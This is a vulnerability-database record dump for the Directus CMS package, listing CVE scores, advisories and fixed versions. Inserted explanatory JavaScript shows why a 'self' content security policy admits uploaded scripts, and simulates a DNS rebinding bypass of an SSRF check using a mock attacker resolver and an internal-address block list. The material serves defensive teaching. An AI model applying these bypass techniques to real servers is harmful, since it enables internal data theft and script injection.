scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/pull/19332
3
reference_url https://github.com/advisories/GHSA-22rr-f3p8-5gf8
reference_id GHSA-22rr-f3p8-5gf8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-22rr-f3p8-5gf8
4
reference_url https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8
reference_id GHSA-22rr-f3p8-5gf8
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8
5
reference_url https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
reference_id GHSA-cchq-frgv-rjh5
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
fixed_packages
0
url pkg:npm/directus@10.6.0
purl pkg:npm/directus@10.6.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-gjju-tu4e-gqfc
5
vulnerability VCID-kqs7-8txh-jyc8
6
vulnerability VCID-m3wb-sstx-v3d6
7
vulnerability VCID-msb5-197k-a3er
8
vulnerability VCID-n7m6-zecb-6qh2
9
vulnerability VCID-wgag-36wa-qyay
10
vulnerability VCID-xc7t-gwaz-ckeu
11
vulnerability VCID-xt9c-32g5-mqes
12
vulnerability VCID-yutw-33sk-5fg3
13
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0
aliases GHSA-22rr-f3p8-5gf8, GMS-2023-2358
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hrqc-8err-4fbx
11
url VCID-kqs7-8txh-jyc8
vulnerability_id VCID-kqs7-8txh-jyc8
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-6534
reference_id
reference_type
scores
0
value 0.00058
scoring_system epss
scoring_elements 0.18294
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-6534
1
reference_url https://directus.io
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://directus.io
2
reference_url https://fluidattacks.com/advisories/capaldi
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/
url https://fluidattacks.com/advisories/capaldi
3
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
reference_id CVE-2024-6534
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
5
reference_url https://directus.io/
reference_id directus.io
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/
url https://directus.io/
6
reference_url https://github.com/advisories/GHSA-3fff-gqw3-vj86
reference_id GHSA-3fff-gqw3-vj86
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3fff-gqw3-vj86
7
reference_url https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86
reference_id GHSA-3fff-gqw3-vj86
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86
fixed_packages
0
url pkg:npm/directus@10.13.2
purl pkg:npm/directus@10.13.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-m3wb-sstx-v3d6
1
vulnerability VCID-m5ng-dsfx-6qev
2
vulnerability VCID-msb5-197k-a3er
3
vulnerability VCID-wgag-36wa-qyay
4
vulnerability VCID-xt9c-32g5-mqes
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2
aliases CVE-2024-6534, GHSA-3fff-gqw3-vj86
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kqs7-8txh-jyc8
12
url VCID-m3wb-sstx-v3d6
vulnerability_id VCID-m3wb-sstx-v3d6
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-24353
reference_id
reference_type
scores
0
value 0.00347
scoring_system epss
scoring_elements 0.57503
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-24353
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804
3
reference_url https://github.com/directus/directus/pull/23716
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/pull/23716
4
reference_url https://github.com/directus/directus/releases/tag/v11.2.0
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/releases/tag/v11.2.0
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-24353
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-24353
7
reference_url https://www.youtube.com/watch?v=DbV4IxbWzN4
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://www.youtube.com/watch?v=DbV4IxbWzN4
8
reference_url https://github.com/advisories/GHSA-pmf4-v838-29hg
reference_id GHSA-pmf4-v838-29hg
reference_type
scores
url https://github.com/advisories/GHSA-pmf4-v838-29hg
fixed_packages
0
url pkg:npm/directus@11.2.0
purl pkg:npm/directus@11.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bjzg-mzjf-cfau
1
vulnerability VCID-m5ng-dsfx-6qev
2
vulnerability VCID-wgag-36wa-qyay
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.0
aliases CVE-2025-24353, GHSA-pmf4-v838-29hg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m3wb-sstx-v3d6
13
url VCID-msb5-197k-a3er
vulnerability_id VCID-msb5-197k-a3er
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46990
reference_id
reference_type
scores
0
value 0.00237
scoring_system epss
scoring_elements 0.46944
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46990
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
3
reference_url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
4
reference_url https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff
5
reference_url https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46990
reference_id CVE-2024-46990
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46990
7
reference_url https://github.com/advisories/GHSA-68g8-c275-xf2m
reference_id GHSA-68g8-c275-xf2m
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-68g8-c275-xf2m
8
reference_url https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m
reference_id GHSA-68g8-c275-xf2m
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m
fixed_packages
0
url pkg:npm/directus@10.13.3
purl pkg:npm/directus@10.13.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3
1
url pkg:npm/directus@11.0.0-rc.1
purl pkg:npm/directus@11.0.0-rc.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-m3wb-sstx-v3d6
1
vulnerability VCID-m5ng-dsfx-6qev
2
vulnerability VCID-wgag-36wa-qyay
3
vulnerability VCID-xt9c-32g5-mqes
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1
2
url pkg:npm/directus@11.1.0
purl pkg:npm/directus@11.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bjzg-mzjf-cfau
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-w1ph-v2n1-nbby
4
vulnerability VCID-wgag-36wa-qyay
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0
aliases CVE-2024-46990, GHSA-68g8-c275-xf2m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-msb5-197k-a3er
14
url VCID-p7d9-91j7-dbab
vulnerability_id VCID-p7d9-91j7-dbab
summary
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text HTML interface that links to an uploaded HTML file, which in turn loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get editor by adding `{ "media_live_embeds": false }` to the _Options Overrides_ option of the Rich Text HTML interface.
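The summary says the uploaded files "satisfy" the content security policy; the reason, presumably, is that uploads are served from the application's own origin and so pass a `'self'` source. The following JavaScript is an added example (not Directus code) with a small matcher for the `script-src` directive that makes this concrete. It handles only the source expressions it uses (`'self'`, `'none'`, `*`, and host sources with optional scheme and wildcard subdomain); it is not a full CSP implementation, and the policy strings, origins and asset paths are made up, as is the assumption that Directus's own policy resembles them.

```javascript
// Added example (not Directus code): a minimal matcher for the script-src
// directive of Content-Security-Policy, used to show why `script-src 'self'`
// still permits a script that was *uploaded* to the application's own origin.

function scriptSources(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  // script-src falls back to default-src when absent, as in CSP.
  return directives['script-src'] || directives['default-src'] || [];
}

// Host-source match: optional scheme, host with optional leading "*.",
// optional port and path (both ignored in this demo).
function hostSourceMatches(source, url) {
  let scheme = null;
  let rest = source;
  const i = source.indexOf('://');
  if (i !== -1) {
    scheme = source.slice(0, i).toLowerCase();
    rest = source.slice(i + 3);
  }
  const host = rest.split('/')[0].split(':')[0].toLowerCase();
  if (scheme && scheme + ':' !== url.protocol) return false;
  if (host.startsWith('*.')) return url.hostname.endsWith(host.slice(1));
  return url.hostname === host;
}

// Would a page at pageOrigin, served with this policy, execute scriptUrl?
function cspAllowsScript(policy, pageOrigin, scriptUrl) {
  const sources = scriptSources(policy);
  const page = new URL(pageOrigin);
  const url = new URL(scriptUrl);
  if (sources.includes("'none'")) return false;
  return sources.some((src) => {
    if (src === "'self'") return url.origin === page.origin; // origin check only
    if (src === '*') return true;
    if (src.startsWith("'")) return false; // nonce/hash/unsafe-* not modelled
    return hostSourceMatches(src, url);
  });
}

const policy = "default-src 'self'; script-src 'self'";
const page = 'https://cms.example.com/admin/';
// Both uploaded files are served by the same origin as the app, so the policy
// accepts the uploaded HTML's <script src> even though an attacker wrote it.
console.log(cspAllowsScript(policy, page, 'https://cms.example.com/assets/3f0b-uploaded.js')); // true
// The same policy rejects it once uploads are served from a separate origin.
console.log(cspAllowsScript(policy, page, 'https://files.example.net/assets/3f0b-uploaded.js')); // false
```

The lesson generalises beyond this advisory: `'self'` asserts where a script is served from, not who authored it, so any feature that lets users upload content to the main origin weakens a `'self'`-based policy. Serving user uploads from a dedicated origin, or disabling the live embed as the workaround suggests, removes the path the summary describes.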
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-24814
reference_id
reference_type
scores
0
value 0.0043
scoring_system epss
scoring_elements 0.62814
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-24814
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/pull/12020
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/
url https://github.com/directus/directus/pull/12020
3
reference_url https://github.com/directus/directus/releases/tag/v9.7.0
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/
url https://github.com/directus/directus/releases/tag/v9.7.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-24814
reference_id CVE-2022-24814
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-24814
5
reference_url https://github.com/advisories/GHSA-xmjj-3c76-5w84
reference_id GHSA-xmjj-3c76-5w84
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xmjj-3c76-5w84
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84
reference_id GHSA-xmjj-3c76-5w84
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/
url https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84
fixed_packages
0
url pkg:npm/directus@9.7.0
purl pkg:npm/directus@9.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-9gba-zszk-p3h6
3
vulnerability VCID-eb8p-vqjt-yfb8
4
vulnerability VCID-ejme-tqn4-byhk
5
vulnerability VCID-et4m-8y15-9fb9
6
vulnerability VCID-eygf-cb4y-hqd3
7
vulnerability VCID-gjju-tu4e-gqfc
8
vulnerability VCID-hrqc-8err-4fbx
9
vulnerability VCID-kqs7-8txh-jyc8
10
vulnerability VCID-m3wb-sstx-v3d6
11
vulnerability VCID-msb5-197k-a3er
12
vulnerability VCID-szny-2sbf-v7de
13
vulnerability VCID-v4vz-smcx-gygb
14
vulnerability VCID-wgag-36wa-qyay
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0
aliases CVE-2022-24814, GHSA-xmjj-3c76-5w84
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p7d9-91j7-dbab
15
url VCID-szny-2sbf-v7de
vulnerability_id VCID-szny-2sbf-v7de
summary Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.
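The DNS rebinding bypass the summary mentions works because the hostname is resolved once to be checked and again when the HTTP client connects, and an attacker-controlled nameserver can answer differently each time. The following JavaScript is an added example (not Directus code and not its fix) that models that gap with a constructed rebinding resolver and a stand-in "network", next to the pinned variant that resolves once and connects to the checked address. Hostnames and addresses are illustrative; the mention of Node's `lookup` option is a general hardening note, not a description of what Directus changed.

```javascript
// Added example (not Directus code): models the check-then-fetch gap that a
// DNS rebinding attack exploits in a remote file importer, and the pinned
// variant that closes it. Resolver and network are offline stand-ins.

// IPv4 ranges a remote-import feature must never connect to ("this" net,
// RFC 1918, carrier-grade NAT, loopback, link-local incl. cloud metadata).
const BLOCKED_CIDRS = [
  ['0.0.0.0', 8], ['10.0.0.0', 8], ['100.64.0.0', 10], ['127.0.0.0', 8],
  ['169.254.0.0', 16], ['172.16.0.0', 12], ['192.168.0.0', 16],
];

function ipv4ToInt(ip) {
  return ip.split('.').reduce((acc, octet) => ((acc << 8) + Number(octet)) >>> 0, 0);
}

function isBlockedAddress(ip) {
  const n = ipv4ToInt(ip);
  return BLOCKED_CIDRS.some(([base, bits]) => {
    const mask = (0xffffffff << (32 - bits)) >>> 0;
    return ((n & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
  });
}

// A rebinding attacker's authoritative DNS: the first answer is a public
// address that passes the check, every later answer is an internal one.
function makeRebindingResolver(publicIp, internalIp) {
  let answered = false;
  return (_hostname) => {
    const ip = answered ? internalIp : publicIp;
    answered = true;
    return ip;
  };
}

// Vulnerable importer: validates one resolution, then hands the URL to an
// HTTP client that resolves the name again and connects to whatever it gets.
function importFileVulnerable(url, resolve) {
  const { hostname } = new URL(url);
  if (isBlockedAddress(resolve(hostname))) throw new Error('blocked');
  const ip = resolve(hostname); // second lookup: time-of-check/time-of-use
  return { connectedTo: ip };
}

// Hardened importer: resolve exactly once, validate that address, and make
// the client connect to it (in Node, e.g. via a custom `lookup` option on
// http.request) with the original hostname kept for Host/SNI. Every redirect
// target must go through the same resolve-once-then-check path.
function importFilePinned(url, resolve) {
  const { hostname } = new URL(url);
  const ip = resolve(hostname);
  if (isBlockedAddress(ip)) throw new Error('blocked');
  return { connectedTo: ip, hostHeader: hostname };
}

const target = 'http://import.attacker.example/file.png';
console.log(importFileVulnerable(target, makeRebindingResolver('203.0.113.10', '127.0.0.1')));
// -> { connectedTo: '127.0.0.1' }
console.log(importFilePinned(target, makeRebindingResolver('203.0.113.10', '127.0.0.1')));
// -> { connectedTo: '203.0.113.10', hostHeader: 'import.attacker.example' }
```

Pinning only helps if the block list is applied to the address actually connected to, including after each redirect; a check on the hostname string alone, or on a resolution the client does not reuse, leaves the rebinding window open. IPv6 and IPv4-mapped IPv6 addresses need equivalent ranges, which this demo omits.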
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-26492
reference_id
reference_type
scores
0
value 0.0023
scoring_system epss
scoring_elements 0.45796
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-26492
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/
url https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff
3
reference_url https://github.com/directus/directus/releases/tag/v9.23.0
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
